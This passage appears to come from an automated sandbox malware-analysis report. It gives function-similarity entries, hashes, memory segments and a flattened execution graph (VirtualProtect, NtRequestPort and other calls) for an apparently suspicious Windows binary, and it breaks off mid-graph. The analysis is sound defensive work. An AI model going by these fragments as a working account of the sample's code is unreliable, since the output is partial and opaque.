                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: ble for
                                      • API String ID: 471065373-1503916205
                                      • Opcode ID: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
                                      • Instruction ID: a760a0af6a9dd20f8d2542be38b32b8cb92488d4ec30a5caf23b55431241c6d9
                                      • Opcode Fuzzy Hash: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
                                      • Instruction Fuzzy Hash: 2E319FB2A09B5582EE298F56E5501AC7772FB98FC0B188432CF9E47765DF3CE4918200
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: std
                                      • API String ID: 2803490479-2826573480
                                      • Opcode ID: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
                                      • Instruction ID: ec05d5d06841e91b72dd1fa700d52f44051a97ad1f1033ef2cb3938682a526bc
                                      • Opcode Fuzzy Hash: 39a9b4e02e6c7c124a628c552a4636f6e40e277c28f87722f2353c0517b7eef5
                                      • Instruction Fuzzy Hash: 7631B07260AB4285EA598F15E5443B937A6EB04B54F2D0136CA9C8B3D3DE3CE1818310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: vector[
                                      • API String ID: 471065373-3542213508
                                      • Opcode ID: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
                                      • Instruction ID: d4375f1381874b07814e0176be7c81766b02ca38091cb4abcb7240c5de77a7f6
                                      • Opcode Fuzzy Hash: c4488cd4258865b302a78e24845e525baf049f33d3f4fcfc29418687803e7592
                                      • Instruction Fuzzy Hash: CA3161B6A09B4582DF29CF56E95416DA762FB58FC0B148832CF9E477A5DF3CD4528300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: &
                                      • API String ID: 471065373-1010288
                                      • Opcode ID: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
                                      • Instruction ID: af62199e48b634e129f551c7fc38e680c471b1d257323857274b6c909d1e5065
                                      • Opcode Fuzzy Hash: c46aeaef957640738deddb87f16563f99d08ba3b34def948dc4d2f740d61f949
                                      • Instruction Fuzzy Hash: EF3190B3A09B8586DB25CF25F4402AEB7A1F758B84F188621DB9D47795EF3CD541C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: EntryFunctionLookupfflush
                                      • String ID: libunwind: pc not in table, pc=0x%llX
                                      • API String ID: 1930725923-1970586329
                                      • Opcode ID: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
                                      • Instruction ID: 17059f845f69c72404c3e5a9f0f07a5bd5ac210e32c29261227c56592e304c7f
                                      • Opcode Fuzzy Hash: 3d495f0f2960550110fa8eb07f73b5c1ec580fd706c87246941946c30414a956
                                      • Instruction Fuzzy Hash: 3A317E62905B9181E7158F34E5913AC73B2EF89B88F288339CA8D56796EF3C9891D340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: operator$r""
                                      • API String ID: 471065373-3690342460
                                      • Opcode ID: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
                                      • Instruction ID: 376dee7bb0a56e473e8a3c0fccdd2ee8be41e78983f6b4757ca8d55c03b07bfa
                                      • Opcode Fuzzy Hash: e1620a572d8d04512c69ef91134d241d4fe72b19f885483c170cd34e2c6e07b0
                                      • Instruction Fuzzy Hash: 5A1190F2A0AB9582DA199F46EA50068B762EB98FD0B148832CF4D47795DF38D5E28300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _time64
                                      • String ID: %s $[%Y-%m-%d %H:%M:%S]
                                      • API String ID: 1670930206-899559958
                                      • Opcode ID: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
                                      • Instruction ID: 356c8f51dedf4a2b9c916477264dd90112f8c3fbbdea8b74c678cc24ce39cdca
                                      • Opcode Fuzzy Hash: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
                                      • Instruction Fuzzy Hash: 0C016D31629B8690EA209F11F9913FA6366FB887D0F685031E98E93B569E3CD14AC700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                      • API String ID: 383729395-3474627141
                                      • Opcode ID: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
                                      • Instruction ID: f9d76d5d1c68761c01db790320c60ec8f3a3609a861695c8a2e35f44a46d0ad7
                                      • Opcode Fuzzy Hash: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
                                      • Instruction Fuzzy Hash: 90F06221A1EA5582E610AF64AA811BD6322EF597D1F689231EF4DD7757DF2CE1828300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: strerrorstrlen
                                      • String ID: (null)
                                      • API String ID: 960536887-3941151225
                                      • Opcode ID: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
                                      • Instruction ID: 3e18b7f4f0c3d5233ec7c0df264b8366d35433dfe4a26fde9b09586872ae83ef
                                      • Opcode Fuzzy Hash: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
                                      • Instruction Fuzzy Hash: C6E0B614B1F60282FA04AEA294951FE69635F84790FBC4036E94EC3387EE3CE4029291
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: strcmp
                                      • String ID:
                                      • API String ID: 1004003707-0
                                      • Opcode ID: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
                                      • Instruction ID: 8b4552b9cf8e5b37ed2dbc9013acc71c1d87281c8cae36613dd0764ae798dfd1
                                      • Opcode Fuzzy Hash: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
                                      • Instruction Fuzzy Hash: 1B214172A0A642C2EB78CE12D247139A6F6FB14794F6D8536CF4DC6792DE3DF8818600
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                      • String ID:
                                      • API String ID: 682475483-0
                                      • Opcode ID: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
                                      • Instruction ID: fd8ab49cbbcc95ea3d832a5df403968181d42c29be117ce7423d9f8a67e91fb2
                                      • Opcode Fuzzy Hash: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
                                      • Instruction Fuzzy Hash: 66012C25E0D60282F6568F52EA142742333BF05BA0FA90435DE0EC7792FF2DAC958241

                                      Execution Graph

                                      Execution Coverage:0.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:51
                                      Total number of Limit Nodes:2
                                      execution_graph 13772 7ff6e3a61140 13775 7ff6e3a61160 13772->13775 13776 7ff6e3a6118b 13775->13776 13777 7ff6e3a611b9 13775->13777 13776->13777 13780 7ff6e3a61190 13776->13780 13778 7ff6e3a611c7 _amsg_exit 13777->13778 13781 7ff6e3a611d3 13777->13781 13778->13781 13779 7ff6e3a611a0 Sleep 13779->13777 13779->13780 13780->13777 13780->13779 13782 7ff6e3a6121a 13781->13782 13783 7ff6e3a61201 _initterm 13781->13783 13800 7ff6e3a62410 13782->13800 13783->13782 13785 7ff6e3a61247 SetUnhandledExceptionFilter 13786 7ff6e3a6126a 13785->13786 13787 7ff6e3a6126f malloc 13786->13787 13788 7ff6e3a6128b 13787->13788 13791 7ff6e3a612d2 13787->13791 13789 7ff6e3a612a0 strlen malloc memcpy 13788->13789 13789->13789 13790 7ff6e3a612d0 13789->13790 13790->13791 13807 7ff6e3a83b80 13791->13807 13801 7ff6e3a62432 13800->13801 13804 7ff6e3a6259f 13800->13804 13802 7ff6e3a624e6 13801->13802 13803 7ff6e3a6252e 13801->13803 13801->13804 13802->13803 13986 7ff6e3a62730 13802->13986 13803->13804 13806 7ff6e3a62579 VirtualProtect 13803->13806 13804->13785 13806->13803 13809 7ff6e3a83b96 13807->13809 13808 7ff6e3a83c8c wcslen 13996 7ff6e3a6153f 13808->13996 13809->13808 13989 7ff6e3a62752 13986->13989 13987 7ff6e3a62794 memcpy 13987->13802 13989->13987 13990 7ff6e3a627d5 VirtualQuery 13989->13990 13991 7ff6e3a62884 13989->13991 13990->13991 13995 7ff6e3a62802 13990->13995 13992 7ff6e3a628b3 GetLastError 13991->13992 13994 7ff6e3a628c7 13992->13994 13993 7ff6e3a62834 VirtualProtect 13993->13987 13993->13992 13995->13987 13995->13993 14000 7ff6e3a61394 13996->14000 13998 7ff6e3a6154e 13999 7ff6e3a61394 2 API calls 13998->13999 14001 7ff6e3a88680 malloc 14000->14001 14002 7ff6e3a613b8 14001->14002 14003 7ff6e3a613c6 NtRequestPort 14002->14003 14003->13998 13762 7ff6e3a61394 13766 7ff6e3a88680 13762->13766 13764 7ff6e3a613b8 13765 7ff6e3a613c6 NtRequestPort 13764->13765 13767 7ff6e3a8869e 13766->13767 13770 7ff6e3a886cb 13766->13770 13767->13764 13768 7ff6e3a88773 13769 7ff6e3a8878f malloc 13768->13769 13771 7ff6e3a887b0 13769->13771 13770->13767 13770->13768 13771->13767

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                      • String ID:
                                      • API String ID: 2643109117-0
                                      • Opcode ID: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
                                      • Instruction ID: ad52f5a23d23c214c2b6e8cc16b8d576ba23f7326ab75b7bd45e7d6b8c5d5049
                                      • Opcode Fuzzy Hash: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
                                      • Instruction Fuzzy Hash: 62515E73F1964781F6109B2DE95A3793FA4BF95B80F004435C94EE73A1DE2EA4C1874A

                                      Control-flow Graph

                                      APIs
                                      • NtRequestPort.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A61156), ref: 00007FF6E3A613F7
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: PortRequest
                                      • String ID:
                                      • API String ID: 2900110961-0
                                      • Opcode ID: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
                                      • Instruction ID: 3744e0ce1cc0dc6cade55385d7258ac9443734480f345688f3513dbbbcac966b
                                      • Opcode Fuzzy Hash: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
                                      • Instruction Fuzzy Hash: 79F0C976A0CB4182D610CF59F84222A7B74FB48380B015835EACDA7765CF3EE0A0CB49

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1028 7ff6e3a76520-7ff6e3a76539 1029 7ff6e3a7653b-7ff6e3a76542 1028->1029 1030 7ff6e3a76549-7ff6e3a7655a 1028->1030 1029->1030 1031 7ff6e3a7655c 1030->1031 1032 7ff6e3a76575-7ff6e3a7657e 1030->1032 1033 7ff6e3a7655e-7ff6e3a76574 1031->1033 1034 7ff6e3a765dc-7ff6e3a765e6 1032->1034 1035 7ff6e3a76580-7ff6e3a76589 1032->1035 1034->1031 1036 7ff6e3a765ec-7ff6e3a765f8 1034->1036 1037 7ff6e3a76640-7ff6e3a766bf 1035->1037 1038 7ff6e3a7658f-7ff6e3a76598 1035->1038 1040 7ff6e3a766f9-7ff6e3a76701 1036->1040 1041 7ff6e3a765fe-7ff6e3a76608 1036->1041 1042 7ff6e3a7688a-7ff6e3a768b6 1037->1042 1043 7ff6e3a766c5-7ff6e3a766d3 1037->1043 1038->1031 1039 7ff6e3a7659a-7ff6e3a765a4 1038->1039 1039->1031 1046 7ff6e3a765a6-7ff6e3a765af 1039->1046 1040->1031 1047 7ff6e3a76707-7ff6e3a7670a 1040->1047 1050 7ff6e3a76610-7ff6e3a76619 1041->1050 1048 7ff6e3a768bc-7ff6e3a768c9 1042->1048 1049 7ff6e3a769c6-7ff6e3a769e5 call 7ff6e3a6d9a0 1042->1049 1044 7ff6e3a76849-7ff6e3a76854 malloc 1043->1044 1045 7ff6e3a766d9-7ff6e3a766ee realloc 1043->1045 1060 7ff6e3a7685a-7ff6e3a76860 1044->1060 1061 7ff6e3a76c67 call 7ff6e3a62d30 1044->1061 1051 7ff6e3a76877-7ff6e3a76883 1045->1051 1052 7ff6e3a766f4 1045->1052 1053 7ff6e3a765b5-7ff6e3a765b7 1046->1053 1054 7ff6e3a767a0-7ff6e3a767a3 1046->1054 1047->1031 1055 7ff6e3a76710-7ff6e3a7672e 1047->1055 1056 7ff6e3a76925-7ff6e3a76928 1048->1056 1079 7ff6e3a76a06-7ff6e3a76a14 1049->1079 1080 7ff6e3a769e7-7ff6e3a769f5 1049->1080 1058 7ff6e3a7661b-7ff6e3a76627 1050->1058 1059 7ff6e3a7662f-7ff6e3a76635 1050->1059 1051->1042 1052->1061 1064 7ff6e3a765c0-7ff6e3a765c9 1053->1064 1054->1031 1068 7ff6e3a767a9-7ff6e3a767ac 1054->1068 1065 7ff6e3a7675a-7ff6e3a7679b 1055->1065 1066 7ff6e3a76730-7ff6e3a7673d malloc 1055->1066 1056->1049 1069 7ff6e3a7692e-7ff6e3a76932 1056->1069 1058->1050 1071 7ff6e3a76629-7ff6e3a7662c 1058->1071 1059->1047 1072 7ff6e3a7663b 1059->1072 1062 7ff6e3a76862-7ff6e3a7686b memcpy 1060->1062 1063 7ff6e3a76870 1060->1063 1075 7ff6e3a76c6c-7ff6e3a76c80 _assert 1061->1075 1062->1063 1063->1051 1064->1054 1073 7ff6e3a765cf-7ff6e3a765d8 1064->1073 1065->1033 1066->1061 1074 7ff6e3a76743-7ff6e3a76757 1066->1074 1068->1031 1076 7ff6e3a767b2-7ff6e3a767d0 1068->1076 1077 7ff6e3a76934-7ff6e3a76938 1069->1077 1078 7ff6e3a76940 1069->1078 1071->1059 1072->1031 1073->1064 1081 7ff6e3a765da 1073->1081 1074->1065 1082 7ff6e3a76c86-7ff6e3a76ccf _assert call 7ff6e3a780f0 call 7ff6e3a63f50 1075->1082 1083 7ff6e3a767fc-7ff6e3a76844 1076->1083 1084 7ff6e3a767d2-7ff6e3a767df malloc 1076->1084 1085 7ff6e3a76942-7ff6e3a76956 memchr 1077->1085 1078->1085 1087 7ff6e3a76a16-7ff6e3a76a1f 1079->1087 1088 7ff6e3a76a25-7ff6e3a76a2b 1079->1088 1080->1082 1086 7ff6e3a769fb-7ff6e3a769ff 1080->1086 1081->1033 1083->1033 1084->1061 1090 7ff6e3a767e5-7ff6e3a767f9 1084->1090 1085->1049 1091 7ff6e3a76958-7ff6e3a7695f 1085->1091 1086->1079 1087->1088 1092 7ff6e3a76af1 1087->1092 1093 7ff6e3a76a30-7ff6e3a76a3e call 7ff6e3a6ba60 1088->1093 1090->1083 1091->1049 1096 7ff6e3a76961-7ff6e3a7696f call 7ff6e3a77b80 1091->1096 1097 7ff6e3a76af5-7ff6e3a76b15 call 7ff6e3a6d9a0 1092->1097 1104 7ff6e3a76a44-7ff6e3a76a4c 1093->1104 1105 7ff6e3a76c13-7ff6e3a76c35 1093->1105 1096->1105 1107 7ff6e3a76975-7ff6e3a7697d 1096->1107 1108 7ff6e3a76b17-7ff6e3a76b23 1097->1108 1109 7ff6e3a76b51 1097->1109 1111 7ff6e3a76acb-7ff6e3a76add 1104->1111 1112 7ff6e3a76a4e-7ff6e3a76a5f 1104->1112 1105->1075 1110 7ff6e3a76c37-7ff6e3a76c4f 1105->1110 1114 7ff6e3a76909-7ff6e3a7691f 1107->1114 1115 7ff6e3a7697f-7ff6e3a76990 1107->1115 1116 7ff6e3a76b54-7ff6e3a76b57 1108->1116 1117 7ff6e3a76b25-7ff6e3a76b28 1108->1117 1109->1116 1118 7ff6e3a76c56-7ff6e3a76c62 1110->1118 1119 7ff6e3a76c51 free 1110->1119 1111->1093 1122 